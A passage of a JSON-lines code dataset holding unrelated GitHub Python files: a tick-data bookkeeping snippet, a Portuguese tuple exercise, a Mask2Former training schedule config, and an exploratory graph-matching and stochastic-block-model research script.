os.walk(r'D:\\Work\\INTERNSHIP\\海通场内\\2023.06.08超高频上证50指数计算\\data\\tick_data/'):\n for ff in f:\n if 'feature' not in ff: continue\n (date, stk_name, suffix) = ff.split('_')\n date = str(pd.to_datetime(date).date())\n counter[stk_name][date] += 1\n\n temp1 = defaultdict(list)\n for stk_name in counter.keys():\n for d, v in counter[stk_name].items():\n if v == 4: temp1[stk_name].append(d)\n\n temp.update(temp1)\n config.complete_status['features']=temp\n save_status(is_tick=True)","repo_name":"EvanHong99/backtest","sub_path":"scripts/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":2420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19293396816","text":"#Dada uma tupla e um elemento, elimine esse elemento da tupla.\n\ndef elimina(tuplas_indices):\n lista = list(tuplas_indices)\n removivel = int(input(\"Digite um número de 0-10, que se queira remover da Tupla:\"))\n if removivel>10 or removivel<0:\n print(\"Número inválido.\")\n quit()\n lista.remove(removivel)\n nova_tupla = tuple(lista)\n print(nova_tupla)\n\n#Programa Principal\n\ntuplas_indices = (0,1,2,3,4,5,6,7,8,9,10)\n\nelimina(tuplas_indices)","repo_name":"LC-ardovino/INFNET","sub_path":"Fundamentos do Desenvolvimento Python/TPs/TP1/Questão 5-3.py","file_name":"Questão 5-3.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28146455864","text":"embed_multi = dict(lr_mult=1.0, decay_mult=0.0)\n# optimizer\noptimizer = dict(\n type='AdamW',\n lr=0.0001,\n weight_decay=0.05,\n eps=1e-8,\n betas=(0.9, 0.999),\n paramwise_cfg=dict(\n custom_keys={\n 'backbone': dict(lr_mult=0.1, decay_mult=1.0),\n 'query_embed': embed_multi,\n 'query_feat': embed_multi,\n 'level_embed': embed_multi,\n },\n norm_decay_mult=0.0)\n)\noptimizer_config = dict(grad_clip=dict(max_norm=0.01, norm_type=2))\n\nlr_config = dict(\n policy='step',\n gamma=0.1,\n by_epoch=False,\n step=[5000, 10000],\n warmup='linear',\n warmup_by_epoch=False,\n warmup_iters=500,\n warmup_ratio=0.001,\n)\n\nmax_iters = 15000\nrunner = dict(type='IterBasedRunner', max_iters=max_iters)\n","repo_name":"lxtGH/Tube-Link","sub_path":"configs/video/_base_/schedules/mask2former_schedules_iter.py","file_name":"mask2former_schedules_iter.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":90,"dataset":"github-code","pt":"53"} +{"seq_id":"3300951498","text":"# %% [markdown]\n# ##\nimport os\nimport time\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport scipy\nimport seaborn as sns\nfrom sklearn.metrics import pairwise_distances\n\nfrom graspy.embed import ClassicalMDS\nfrom graspy.match import GraphMatch\nfrom graspy.plot import heatmap\nfrom graspy.simulations import sbm, sbm_corr\nfrom src.data import load_metagraph\nfrom src.graph import preprocess\nfrom src.io import savecsv, savefig\nfrom src.utils import invert_permutation\nfrom src.visualization import CLASS_COLOR_DICT, adjplot\n\nprint(scipy.__version__)\n\nFNAME = os.path.basename(__file__)[:-3]\nprint(FNAME)\n\nrc_dict = {\n \"axes.spines.right\": False,\n \"axes.spines.top\": False,\n \"axes.formatter.limits\": (-3, 3),\n \"figure.figsize\": (6, 3),\n \"figure.dpi\": 100,\n \"axes.edgecolor\": \"lightgrey\",\n \"ytick.color\": \"grey\",\n \"xtick.color\": \"grey\",\n \"axes.labelcolor\": \"dimgrey\",\n \"text.color\": \"dimgrey\",\n}\nfor key, val in rc_dict.items():\n mpl.rcParams[key] = val\ncontext = sns.plotting_context(context=\"talk\", font_scale=1, rc=rc_dict)\nsns.set_context(context)\n\nnp.random.seed(8888)\n\n\ndef stashfig(name, **kws):\n savefig(name, foldername=FNAME, save_on=True, **kws)\n\n\ndef stashcsv(df, name, **kws):\n savecsv(df, name, foldername=FNAME, **kws)\n\n\ndef random_permutation(n):\n perm_inds = np.random.choice(int(n), replace=False, size=int(n))\n P = np.zeros((n, n))\n P[np.arange(len(P)), perm_inds] = 1\n return P\n\n\n# %% [markdown]\n# ##\n\nshow_adjs = False\nB = np.array([[0.3, 0.7], [0.05, 0.3]])\nrho = 0.9\nn_per_block = 10\nn_blocks = len(B)\ncomm = n_blocks * [n_per_block]\n\nn_init = 50\neps = 1.0\nn_samples = 20\n\nrows = []\nfor i in range(n_samples):\n A1, A2 = sbm_corr(comm, B, rho)\n max_score = np.trace(A1 @ A2.T)\n\n shuffle_inds = np.random.choice(len(A1), replace=False, size=len(A1))\n A2_shuffle = A2[np.ix_(shuffle_inds, shuffle_inds)]\n\n if show_adjs:\n fig, axs = plt.subplots(1, 4, figsize=(10, 5))\n heatmap(A1, ax=axs[0], cbar=False, title=\"Graph 1\")\n heatmap(A2, ax=axs[1], cbar=False, title=\"Graph 2\")\n heatmap(A1 - A2, ax=axs[2], cbar=False, title=\"Diff (G1 - G2)\")\n heatmap(A2_shuffle, ax=axs[3], cbar=False, title=\"Graph 2 shuffled\")\n\n P = np.zeros_like(A1)\n P[np.arange(len(P)), shuffle_inds] = 1\n fig, axs = plt.subplots(1, 4, figsize=(20, 5))\n heatmap(A2, ax=axs[0], cbar=False, title=\"Graph 2\")\n heatmap(P @ A2 @ P.T, ax=axs[1], cbar=False, title=\"P shuffled\")\n heatmap(A2_shuffle, ax=axs[2], cbar=False, title=\"Index shuffled\")\n heatmap(P.T @ A2_shuffle @ P, ax=axs[3], cbar=False, title=\"P unshuffled\")\n\n for init_weight in [0, 0.25, 0.5, 0.75, 0.9, 0.95, \"random\"]:\n\n import matplotlib.transforms as transforms\n\n n_verts = A1.shape[0]\n\n all_positions = []\n init_indicator = []\n\n gm = GraphMatch(\n n_init=n_init,\n init=\"barycenter\",\n init_weight=init_weight,\n max_iter=20,\n shuffle_input=False,\n eps=eps,\n )\n gm.fit(A1, A2_shuffle)\n results = gm.results_\n progress = gm.progress_\n final_scores = progress.groupby(\"init_idx\")[\"pseudoscore\"].max()\n progress[\"final_score\"] = progress[\"init_idx\"].map(final_scores)\n progress[\"optimal\"] = np.abs((progress[\"final_score\"] - max_score)) < 0.1\n p_found = progress[\"optimal\"].mean()\n row = {\"p_found\": p_found, \"init_weight\": init_weight}\n rows.append(row)\n\ninit_weight_results = pd.DataFrame(rows)\nfig, ax = plt.subplots(1, 1, figsize=(8, 4))\nsns.stripplot(data=init_weight_results, x=\"init_weight\", y=\"p_found\", ax=ax)\nmean_results = init_weight_results.groupby(\"init_weight\").mean().reset_index()\nsns.stripplot(\n data=mean_results,\n x=\"init_weight\",\n y=\"p_found\",\n ax=ax,\n size=30,\n marker=\"_\",\n linewidth=1,\n)\n\n# %% [markdown]\n# ##\n\nfig, axs = plt.subplots(2, 1, figsize=(8, 8), sharex=True)\n\nax = axs[0]\ntrans = transforms.blended_transform_factory(ax.transAxes, ax.transData)\nsns.lineplot(\n data=progress,\n x=\"iter\",\n y=\"grad\",\n hue=\"init_idx\",\n palette=\"tab20\",\n legend=False,\n alpha=0.5,\n linewidth=1,\n ax=ax,\n)\nsns.lineplot(\n data=progress[progress[\"optimal\"]],\n x=\"iter\",\n y=\"grad\",\n hue=\"init_idx\",\n palette=\"tab20\",\n legend=False,\n alpha=1,\n ax=ax,\n)\nax.axhline(eps, linestyle=\":\", color=\"darkred\")\nax.text(1.01, eps, \"Epsilon\", transform=trans, va=\"center\", color=\"darkred\")\nax.set_ylabel(\"Gradient\")\n\nax = axs[1]\ntrans = transforms.blended_transform_factory(ax.transAxes, ax.transData)\nsns.lineplot(\n data=progress,\n x=\"iter\",\n y=\"pseudoscore\",\n hue=\"init_idx\",\n palette=\"tab20\",\n legend=False,\n alpha=0.5,\n ax=ax,\n linewidth=1,\n)\nsns.lineplot(\n data=progress[progress[\"optimal\"]],\n x=\"iter\",\n y=\"pseudoscore\",\n hue=\"init_idx\",\n palette=\"tab20\",\n legend=False,\n alpha=1,\n ax=ax,\n)\nax.axhline(max_score, linestyle=\":\", color=\"black\")\n\nax.text(\n 1.01,\n max_score,\n f\"Optimal\\n{p_max:0.2f} found\",\n transform=trans,\n va=\"center\",\n color=\"black\",\n)\nax.set_ylabel(\"Score\")\nax.set_xlabel(\"Iteration\")\nstashfig(\"score-by-iter\")\n\n\n# %% [markdown]\n# ##\n\nfrom src.flow import make_exp_match, fit_gm_exp, diag_indices\n\n\ndef get_feedforward_B(low_p, diag_p, feedforward_p, n_blocks=5):\n B = np.zeros((n_blocks, n_blocks))\n B += low_p\n B -= np.diag(np.diag(B))\n B -= np.diag(np.diag(B, k=1), k=1)\n B += np.diag(diag_p * np.ones(n_blocks))\n B += np.diag(feedforward_p * np.ones(n_blocks - 1), k=1)\n return B\n\n\nlow_p = 0.01\ndiag_p = 0.1\nfeedforward_p = 0.3\nn_blocks = 10\nn_per_block = 25 # 50\ncommunity_sizes = n_blocks * [n_per_block]\n\nbasename = f\"-n_blocks={n_blocks}-n_per_block={n_per_block}\"\n\nblock_probs = get_feedforward_B(low_p, diag_p, feedforward_p, n_blocks=n_blocks)\nfig, axs = plt.subplots(1, 2, figsize=(20, 10))\nsns.heatmap(block_probs, annot=True, cmap=\"Reds\", cbar=False, ax=axs[0], square=True)\naxs[0].xaxis.tick_top()\naxs[0].set_title(\"Block probability matrix\", pad=25)\n\nnp.random.seed(88)\nadj, labels = sbm(\n community_sizes, block_probs, directed=True, loops=False, return_labels=True\n)\nn_verts = adj.shape[0]\n\nadjplot(adj, sort_class=labels, cbar=False, ax=axs[1], square=True)\naxs[1].set_title(\"Adjacency matrix\", pad=25)\nplt.tight_layout()\nstashfig(\"sbm\" + basename)\n\n# %% [markdown]\n# ##\n\ncurrtime = time.time()\n\nn_verts = len(adj)\n\nhalfs = [0.05, 0.1, 0.5, 1, 5, 10, 50, 100]\n\nalphas = [np.round(np.log(2) / (h * n_verts), decimals=7) for h in halfs]\n\nfrom sklearn.model_selection import ParameterGrid\n\nparam_grid = {\n \"alpha\": alphas[:4],\n \"beta\": [1, 0.5, 0.3], # 0.9, 0.7, 0.5, 0.3, 0.1],\n \"norm\": [False],\n \"c\": [0],\n}\nparams = list(ParameterGrid(param_grid))\n\n\ndef calc_accuracy(block_preds):\n acc = (block_preds == labels).astype(float).mean()\n return acc\n\n\ndef calc_abs_dist(block_preds):\n mae = np.abs(block_preds - labels).mean()\n return mae\n\n\ndef calc_euc_dist(block_preds):\n sse = np.sqrt(((block_preds - labels) ** 2).sum())\n mse = sse / len(block_preds)\n return mse\n\n\ndef calc_scores(perm):\n block_preds = perm // n_per_block\n acc = calc_accuracy(block_preds)\n mae = calc_abs_dist(block_preds)\n mse = calc_euc_dist(block_preds)\n return acc, mae, mse\n # ax.text(\n # 0.75,\n # 0.07,\n # f\"Acc. {acc:.2f}\\nMAE {mae:.2f}\\nMSE {mse:.2f}\",\n # transform=ax.transAxes,\n # )\n\n\nn_init = 25\n\nrows = []\nfor p in params:\n gm = GraphMatch(\n n_init=n_init, init=\"barycenter\", init_weight=0.9, max_iter=20, eps=1\n )\n match = make_exp_match(adj, **p)\n gm.fit(adj, match)\n perm = gm.perm_inds_\n acc, mae, mse = calc_scores(perm)\n row = p.copy()\n row[\"acc\"] = acc\n row[\"mae\"] = mae\n row[\"mse\"] = mse\n row[\"score\"] = gm.score_\n row[\"match_sum\"] = np.sum(match)\n row[\"match_fro\"] = np.linalg.norm(match)\n rows.append(row)\n\n# %% [markdown]\n# ##\nres_df = pd.DataFrame(rows)\nres_df[\"norm_score\"] = res_df[\"score\"] / res_df\n\nheatmap_kws = dict(annot=True, annot_kws={\"size\": 8}, cmap=\"Reds\")\nfig, axs = plt.subplots(1, 2, figsize=(16, 8), sharey=True)\nax = axs[0]\nscore_df = res_df.pivot(index=\"alpha\", columns=\"beta\", values=\"score\")\nsns.heatmap(data=score_df, ax=ax, **heatmap_kws)\n\nax = axs[1]\nacc_df = res_df.pivot(index=\"alpha\", columns=\"beta\", values=\"acc\")\nsns.heatmap(data=acc_df, ax=ax, **heatmap_kws)\n\nplt.yticks(rotation=0)\n# %% [markdown]\n# ##\nfig, axs = plt.subplots(1, 3, figsize=(24, 8), sharey=True)\nax = axs[0]\nunnorm_df = res_df[res_df[\"norm\"] == False]\ncorr_df = unnorm_df.pivot(index=\"alpha\", columns=\"beta\", values=\"corr\")\nsns.heatmap(data=corr_df, ax=ax, **heatmap_kws)\nax.set_title(\"Norm = False\")\nax = axs[1]\nfro_df = res_df[res_df[\"norm\"] == \"fro\"]\ncorr_df = fro_df.pivot(index=\"alpha\", columns=\"beta\", values=\"corr\")\nsns.heatmap(data=corr_df, ax=ax, **heatmap_kws)\nax.set_title(\"Norm = fro\")\nax = axs[2]\nsum_df = res_df[res_df[\"norm\"] == \"sum\"]\ncorr_df = sum_df.pivot(index=\"alpha\", columns=\"beta\", values=\"corr\")\nsns.heatmap(data=corr_df, ax=ax, **heatmap_kws)\nax.set_title(\"Norm = sum\")\nplt.yticks(rotation=0)\nstashfig(\"corr-heatmaps\" + basename)\n\nfig, axs = plt.subplots(1, 3, figsize=(24, 8), sharey=True)\nax = axs[0]\nunnorm_df = res_df[res_df[\"norm\"] == False]\ncorr_df = unnorm_df.pivot(index=\"alpha\", columns=\"beta\", values=\"score\")\nsns.heatmap(data=corr_df, ax=ax, **heatmap_kws)\nax.set_title(\"Norm = False\")\nax = axs[1]\nfro_df = res_df[res_df[\"norm\"] == \"fro\"]\ncorr_df = fro_df.pivot(index=\"alpha\", columns=\"beta\", values=\"score\")\nsns.heatmap(data=corr_df, ax=ax, **heatmap_kws)\nax.set_title(\"Norm = fro\")\nax = axs[2]\nsum_df = res_df[res_df[\"norm\"] == \"sum\"]\ncorr_df = sum_df.pivot(index=\"alpha\", columns=\"beta\", values=\"score\")\nsns.heatmap(data=corr_df, ax=ax, **heatmap_kws)\nax.set_title(\"Norm = sum\")\nplt.yticks(rotation=0)\nstashfig(\"score-heatmaps\" + basename)\n\n\n# %% [markdown]\n# ##\n# indicator = np.full(len(gm.positions_), i)\n# all_positions += gm.positions_\n# init_indicator.append(indicator)\n\ninit_indicator.append([\"Barycenter\"])\ninit_indicator.append([\"Truth\"])\ninit_indicator = np.concatenate(init_indicator)\n# init_indicator = np.array(init_indicator)\nall_positions.append(np.full(A1.shape, 1 / A1.size))\nall_positions.append(P.T)\nall_positions = np.array(all_positions)\nall_positions = all_positions.reshape((len(all_positions), -1))\n\n\nposition_pdist = pairwise_distances(all_positions, metric=\"euclidean\")\n\n\ncmds = ClassicalMDS(n_components=2, dissimilarity=\"euclidean\")\nall_X = cmds.fit_transform(all_positions)\nall_X -= all_X[-1]\n\n# remove_rand = False\n# if remove_rand:\n# X = all_X[n_rand:]\n# init_indicator = init_indicator[n_rand:]\n# else:\nX = all_X\n\n\nplot_df = pd.DataFrame(data=X)\nplot_df[\"init\"] = init_indicator\nsns.set_context(\"talk\")\nfig, ax = plt.subplots(1, 1, figsize=(10, 10))\n# sns.scatterplot(data=plot_df[plot_df[\"init\"] == \"Random\"], x=0, y=1, ax=ax)\nsns.lineplot(\n data=plot_df[~plot_df[\"init\"].isin([\"Barycenter\", \"Truth\", \"Random\"])],\n x=0,\n y=1,\n hue=\"init\",\n palette=sns.color_palette(\"husl\", n_init),\n ax=ax,\n legend=False,\n # markers=True,\n # style=\"init\",\n)\nsns.scatterplot(\n data=plot_df[plot_df[\"init\"] == \"Barycenter\"],\n x=0,\n y=1,\n ax=ax,\n s=200,\n marker=\"s\",\n color=\"slategrey\",\n)\nsns.scatterplot(\n data=plot_df[plot_df[\"init\"] == \"Truth\"],\n x=0,\n y=1,\n ax=ax,\n s=400,\n marker=\"*\",\n color=\"green\",\n alpha=0.8,\n)\ncollections = ax.collections\ncollections[-1].set_zorder(n_init + 100)\ncollections[-2].set_zorder(n_init + 200)\nax.axis(\"off\")\n\n# %%\nn_rand = 100\npermutations = [random_permutation(n_verts) for _ in range(n_rand)]\nrandom_stochastics = [random_permutation(n_verts) for _ in range(n_rand)]\nbarycenter = np.full(A1.shape, 1 / A1.size)\nall_positions = []\nall_positions += permutations\nall_positions += random_stochastics\nall_positions += [barycenter]\nlabels = n_rand * [\"Permutation\"] + n_rand * [\"Doubly stochastic\"] + [\"Barycenter\"]\n\nall_positions = np.array(all_positions)\n\nall_positions = all_positions.reshape((len(all_positions), -1))\n\ncmds = ClassicalMDS(n_components=2, dissimilarity=\"euclidean\")\nX = cmds.fit_transform(all_positions)\n\nplot_df = pd.DataFrame(data=X)\nplot_df[\"label\"] = labels\nsns.set_context(\"talk\")\nfig, ax = plt.subplots(1, 1, figsize=(10, 10))\nsns.scatterplot(data=plot_df, x=0, y=1, ax=ax, hue=\"label\")\n\n\n# %% [markdown]\n# ##\n\n\n# # %% [markdown]\n# # ## Create the matching matrix\n\n\n# def diag_indices(length, k=0):\n# return (np.arange(length - k), np.arange(k, length))\n\n\n# def make_flat_match(length, **kws):\n# match_mat = np.zeros((length, length))\n# match_mat[np.triu_indices(length, k=1)] = 1\n# return match_mat\n\n\n# def make_linear_match(length, offset=0, **kws):\n# match_mat = np.zeros((length, length))\n# for k in np.arange(1, length):\n# match_mat[diag_indices(length, k)] = length - k + offset\n# return match_mat\n\n\n# def normalize_match(graph, match_mat):\n# return match_mat / match_mat.sum() * graph.sum()\n\n\n# # %% [markdown]\n# # ##\n\n# methods = [make_flat_match, make_linear_match, make_exp_match]\n# names = [\"Flat\", \"Linear\", \"Exp\"]\n\n# gm = GraphMatch(\n# n_init=25, init_method=\"rand\", max_iter=80, eps=0.05, shuffle_input=True\n# )\n# alpha = 0.005\n# match_mats = []\n# permutations = []\n# for method, name in zip(methods, names):\n# print(name)\n# match_mat = method(len(adj), alpha=alpha)\n# match_mat = normalize_match(adj, match_mat)\n# match_mats.append(match_mat)\n# gm.fit(match_mat, adj)\n# permutations.append(gm.perm_inds_)\n\n# # %% [markdown]\n# # ##\n# from src.hierarchy import signal_flow\n# from src.visualization import remove_axis\n# import pandas as pd\n\n# n_verts = len(adj)\n# sf = signal_flow(adj)\n# sf_perm = np.argsort(-sf)\n# inds = np.arange(n_verts)\n\n# plot_df = pd.DataFrame()\n# plot_df[\"labels\"] = labels\n# plot_df[\"x\"] = inds\n\n\n# def format_order_ax(ax):\n# ax.set_xticks([])\n# ax.set_yticks([])\n# ax.set_ylabel(\"\")\n# ax.set_xlabel(\"True order\")\n# ax.axis(\"square\")\n\n\n# if n_blocks > 10:\n# pal = \"tab20\"\n# else:\n# pal = \"tab10\"\n# color_dict = dict(zip(np.unique(labels), sns.color_palette(pal, n_colors=n_blocks)))\n\n\n# def plot_diag_boxes(ax):\n# for i in range(n_blocks):\n# low = i * n_per_block - 0.5\n# high = (i + 1) * n_per_block + 0.5\n# xs = [low, high, high, low, low]\n# ys = [low, low, high, high, low]\n# ax.plot(xs, ys, color=color_dict[i], linestyle=\"--\", linewidth=0.7, alpha=0.7)\n\n\n# def calc_accuracy(block_preds):\n# acc = (block_preds == labels).astype(float).mean()\n# return acc\n\n\n# def calc_abs_dist(block_preds):\n# mae = np.abs(block_preds - labels).mean()\n# return mae\n\n\n# def calc_euc_dist(block_preds):\n# sse = np.sqrt(((block_preds - labels) ** 2).sum())\n# mse = sse / len(block_preds)\n# return mse\n\n\n# def plot_scores(perm, ax):\n# block_preds = perm // n_per_block\n# acc = calc_accuracy(block_preds)\n# mae = calc_abs_dist(block_preds)\n# mse = calc_euc_dist(block_preds)\n# ax.text(\n# 0.75,\n# 0.07,\n# f\"Acc. {acc:.2f}\\nMAE {mae:.2f}\\nMSE {mse:.2f}\",\n# transform=ax.transAxes,\n# )\n\n\n# # model\n# fig, axs = plt.subplots(3, 6, figsize=(30, 15))\n\n# scatter_kws = dict(\n# x=\"x\",\n# y=\"y\",\n# hue=\"labels\",\n# s=7,\n# linewidth=0,\n# palette=color_dict,\n# legend=False,\n# alpha=1,\n# )\n# first = 0\n# ax = axs[0, first]\n# ax.set_title(\"Model (truth)\")\n# sns.heatmap(block_probs, annot=True, cmap=\"Reds\", cbar=False, ax=ax, square=True)\n# show_annot_array = np.zeros_like(block_probs, dtype=bool)\n# show_annot_array[0, :3] = 1\n# for text, show_annot in zip(\n# ax.texts, (element for row in show_annot_array for element in row)\n# ):\n# text.set_visible(show_annot)\n# ax.set_xticks([])\n# ax.set_yticks([])\n\n# adjplot(adj, colors=labels, ax=axs[1, first], cbar=False)\n# plot_df[\"y\"] = inds\n# ax = axs[2, first]\n# sns.scatterplot(data=plot_df, ax=ax, **scatter_kws)\n# format_order_ax(ax)\n# ax.set_ylabel(\"Predicted order\")\n# plot_diag_boxes(ax)\n# plot_scores(inds, ax)\n\n# # random\n# first = 1\n# remove_axis(axs[0, first])\n# axs[0, first].set_title(\"Random\")\n# perm = inds.copy()\n# np.random.shuffle(perm)\n# adjplot(adj[np.ix_(perm, perm)], colors=labels[perm], ax=axs[1, first], cbar=False)\n# plot_df[\"y\"] = perm\n# ax = axs[2, first]\n# sns.scatterplot(data=plot_df, ax=ax, **scatter_kws)\n# format_order_ax(ax)\n# plot_diag_boxes(ax)\n# plot_scores(perm, ax)\n\n# # signal flow\n# first = 2\n# remove_axis(axs[0, first])\n# axs[0, first].set_title(\"Signal flow\")\n# adjplot(\n# adj[np.ix_(sf_perm, sf_perm)], colors=labels[sf_perm], ax=axs[1, first], cbar=False\n# )\n# plot_df[\"y\"] = sf_perm\n# ax = axs[2, first]\n# sns.scatterplot(data=plot_df, ax=ax, **scatter_kws)\n# format_order_ax(ax)\n# plot_diag_boxes(ax)\n# plot_scores(sf_perm, ax)\n\n\n# # graph matching\n# first = 3\n# for i, (match, perm) in enumerate(zip(match_mats, permutations)):\n# axs[0, i + first].set_title(names[i])\n# # matching matrix\n# adjplot(match, ax=axs[0, i + first], cbar=False)\n# # adjacency\n# adjplot(\n# adj[np.ix_(perm, perm)], colors=labels[perm], ax=axs[1, i + first], cbar=False\n# )\n# # ranks\n# plot_df[\"y\"] = perm\n# ax = axs[2, i + first]\n# sns.scatterplot(data=plot_df, ax=ax, **scatter_kws)\n# format_order_ax(ax)\n# plot_diag_boxes(ax)\n# plot_scores(perm, ax)\n\n\n# plt.tight_layout()\n# stashfig(\"sbm-ordering\" + basename)\n\n\n# # axs[0, first].set_title(\"Signal flow\")\n# # axs[0, first].set_ylabel(\"Match matrix\")\n# # axs[1, first].set_ylabel(\"Sorted adjacency\")\n\n\n# #%%\n\n\n# # perm = fit_gm_exp(adj, 0.005, n_init=10)\n# # perm_adj = adj[np.ix_(perm, perm)]\n\n# # ps = calc_p_by_k(ks, perm_adj)\n# # exps = exp_func(ks, alpha)\n\n\n# from scipy.optimize import curve_fit\n\n\n# # param_guess, _ = curve_fit(exp_func, ks, ps, p0=(alpha, 1))\n# # alpha_guess = param_guess[0]\n# # beta_guess = param_guess[1]\n# # plt.figure()\n# # sns.lineplot(x=ks, y=ps)\n# # sns.lineplot(x=ks, y=exps)\n# # sns.lineplot(x=ks, y=exp_func(ks, alpha_guess, beta_guess))\n\n# # %% [markdown]\n# # ##\n\n# length = len(adj)\n\n# ks = np.arange(1, length)\n\n\n# def exp_func(k, alpha, beta=1, c=0):\n# return beta * np.exp(-alpha * (k - 1)) + c\n\n\n# def make_exp_match(length, alpha=0.5, beta=1, c=0, **kws):\n# match_mat = np.zeros((length, length))\n# for k in np.arange(1, length):\n# match_mat[diag_indices(length, k)] = exp_func(k, alpha, beta, c)\n# return match_mat\n\n\n# def fit_gm_exp(adj, alpha, beta=1, c=0, n_init=5, norm=False):\n# gm = GraphMatch(\n# n_init=n_init, init_method=\"rand\", max_iter=80, eps=0.05, shuffle_input=True\n# )\n# length = len(adj)\n# match_mat = make_exp_match(length, alpha=alpha)\n# if norm:\n# match_mat = normalize_match(adj, match_mat)\n# match_mats.append(match_mat)\n# gm.fit(match_mat, adj)\n# return gm.perm_inds_\n\n\n# def calc_p_by_k(ks, perm_adj):\n# length = len(perm_adj)\n# ps = []\n# for k in ks:\n# p = perm_adj[diag_indices(length, k)].mean()\n# ps.append(p)\n# return np.array(ps)\n\n\n# def get_vals_by_k(ks, perm_adj):\n# ys = []\n# xs = []\n# for k in ks:\n# y = perm_adj[diag_indices(len(perm_adj), k)]\n# ys.append(y)\n# x = np.full(len(y), k)\n# xs.append(x)\n# return np.concatenate(ys), np.concatenate(xs)\n\n\n# #%%\n# alpha_guess = 0.005\n# beta_guess = 1\n# c_guess = np.mean(adj)\n# opt_beta = True\n# opt_c = True\n# n_iter = 3\n# for i in range(n_iter):\n# print(i)\n# perm = fit_gm_exp(adj, alpha_guess, beta_guess, c_guess, n_init=10)\n# perm_adj = adj[np.ix_(perm, perm)]\n# ys, xs = get_vals_by_k(ks, perm_adj)\n# ps = calc_p_by_k(ks, perm_adj)\n# exps = exp_func(ks, alpha_guess, beta_guess)\n# if opt_beta:\n# param_guess, _ = curve_fit(\n# exp_func, xs, ys, p0=(alpha_guess, beta_guess, c_guess)\n# )\n# beta_guess = 1 # param_guess[1]\n# c_guess = param_guess[2]\n# else:\n# param_guess, _ = curve_fit(exp_func, ks, ps, p0=(alpha))\n# alpha_guess = param_guess[0]\n\n# plt.figure()\n# sns.lineplot(x=ks, y=ps)\n# sns.lineplot(x=ks, y=exps)\n# sns.lineplot(x=ks, y=exp_func(ks, alpha_guess, beta_guess, c_guess))\n# adjplot(adj[np.ix_(perm, perm)], colors=labels[perm], cbar=False)\n# plt.show()\n\n# # %% [markdown]\n# # ##\n# ps = calc_p_by_k(ks, adj)\n# ys, xs = get_vals_by_k(ks, adj)\n# param_guess, _ = curve_fit(exp_func, xs, ys, p0=(0.05, 0.5, np.mean(adj)))\n# exps = exp_func(ks, *param_guess)\n# plt.figure()\n# sns.lineplot(x=ks, y=ps)\n# sns.lineplot(x=ks, y=exps)\n# perm = fit_gm_exp(adj, param_guess[0], param_guess[1], param_guess[2], n_init=10)\n# adjplot(adj[np.ix_(perm, perm)], colors=labels[perm], cbar=False)\n\n# # %% [markdown]\n# # ##\n\n\n# permutations = []\n# alphas = [0.001, 0.005, 0.01, 0.05]\n# for alpha in alphas:\n# perm = fit_gm_exp(adj, alpha, n_init=5)\n# permutations.append(perm)\n# _, _, top, _ = adjplot(adj[np.ix_(perm, perm)], colors=labels[perm], cbar=False)\n# top.set_title(alpha)\n\n# # %% [markdown]\n# # ##\n# fig, axs = plt.subplots(3, 4, figsize=(20, 15))\n\n# for i, (match, perm) in enumerate(zip(match_mats, permutations)):\n# perm_adj = adj[np.ix_(perm, perm)]\n# alpha = alphas[i]\n\n# exp = exp_func(ks, alpha=alpha)\n\n# ax = axs[0, i]\n# ax.set_title(alpha)\n\n# sns.lineplot(x=ks, y=calc_p_by_k(ks, perm_adj), ax=ax)\n# sns.lineplot(x=ks, y=exp, ax=ax)\n\n# # matching matrix\n# # adjplot(match, ax=axs[0, i], cbar=False)\n# # adjacency\n# _, _, top, _ = adjplot(perm_adj, colors=labels[perm], ax=axs[1, i], cbar=False)\n# # top.set_title(alpha)\n# # ranks\n# plot_df[\"y\"] = perm\n# ax = axs[2, i]\n# sns.scatterplot(data=plot_df, ax=ax, **scatter_kws)\n# format_order_ax(ax)\n# plot_diag_boxes(ax)\n# plot_scores(perm, ax)\n# if i == 0:\n# ax.set_ylabel(\"Predicted order\")\n\n# stashfig(\"alpha-matters\" + basename)\n\n\n# # %% [markdown]\n# # ## Oracles\n# # permutations = []\n# # alphas = [0.001, 0.005, 0.01, 0.05]\n# # for alpha in alphas:\n# # perm = fit_gm_exp(adj, alpha, n_init=5)\n# # permutations.append(perm)\n# # _, _, top, _ = adjplot(adj[np.ix_(perm, perm)], colors=labels[perm], cbar=False)\n# # top.set_title(alpha)\n\n# ys, xs = get_vals_by_k(ks, adj)\n\n# inits = [(0.05), (0.05, 1), (0.05, 1, np.mean(adj))]\n# names = [r\"$y = exp(-ak)$\", r\"$y = b \\cdot exp(-ak)$\", r\"$y = b \\cdot exp(-ak) + c$\"]\n# permutations = []\n# params = []\n# for init_params, name in zip(inits, names):\n# # just decay\n# param_guess, _ = curve_fit(exp_func, xs, ys, p0=init_params)\n# params.append(param_guess)\n# exps = exp_func(ks, *param_guess)\n# perm = fit_gm_exp(adj, *param_guess, n_init=5)\n# permutations.append(perm)\n\n# # %% [markdown]\n# # ##\n# fig, axs = plt.subplots(3, 3, figsize=(15, 15))\n\n# for i, (name, perm) in enumerate(zip(names, permutations)):\n# perm_adj = adj[np.ix_(perm, perm)]\n# p = params[i]\n\n# exp = exp_func(ks, *p)\n\n# ax = axs[0, i]\n# ax.set_title(name)\n\n# sns.lineplot(x=ks, y=calc_p_by_k(ks, perm_adj), ax=ax, label=r\"$\\hat{P}$\")\n# sns.lineplot(x=ks, y=exp, ax=ax, label=r\"Match matrix\")\n# if i > 0:\n# ax.get_legend().remove()\n# ax.set_xlabel(\"k\")\n# ax.set_xticks([])\n\n# # matching matrix\n# # adjplot(match, ax=axs[0, i], cbar=False)\n# # adjacency\n# _, _, top, _ = adjplot(perm_adj, colors=labels[perm], ax=axs[1, i], cbar=False)\n# # top.set_title(alpha)\n# # ranks\n# plot_df[\"y\"] = perm\n# ax = axs[2, i]\n# sns.scatterplot(data=plot_df, ax=ax, **scatter_kws)\n# format_order_ax(ax)\n# plot_diag_boxes(ax)\n# plot_scores(perm, ax)\n\n# axs[-1, 0].set_ylabel(\"Predicted order\")\n# axs[0, 0].set_ylabel(\"y\")\n# fig.suptitle(\"Oracle parameter estimates (a, b, c)\", y=0.95)\n# stashfig(\"oracle-fits\" + basename)\n\n# # %% [markdown]\n# # ## EM way\n\n# n_init = 5\n# alpha_guess = 